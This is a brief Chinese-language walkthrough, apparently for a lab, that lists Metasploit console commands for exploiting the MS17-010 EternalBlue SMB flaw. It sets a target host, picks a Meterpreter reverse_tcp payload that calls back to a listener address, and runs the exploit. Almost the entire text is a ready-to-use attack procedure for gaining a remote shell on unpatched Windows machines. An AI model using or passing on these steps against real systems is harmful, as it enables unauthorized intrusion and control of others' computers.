打开MSF
msfconsole
搜索ms17-010模块
search ms17-010
使用该模块
use exploit/windows/smb/ms17_010_eternalblue
设置远程主机(靶机)
set rhost 192.168.229.130
【可选】 配置payload
payload只需要配置监听返回会话的IP;
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(ms17_010_eternalblue) > set lhost 10.10.10.131 lhost => 10.10.10.131
启动
exploit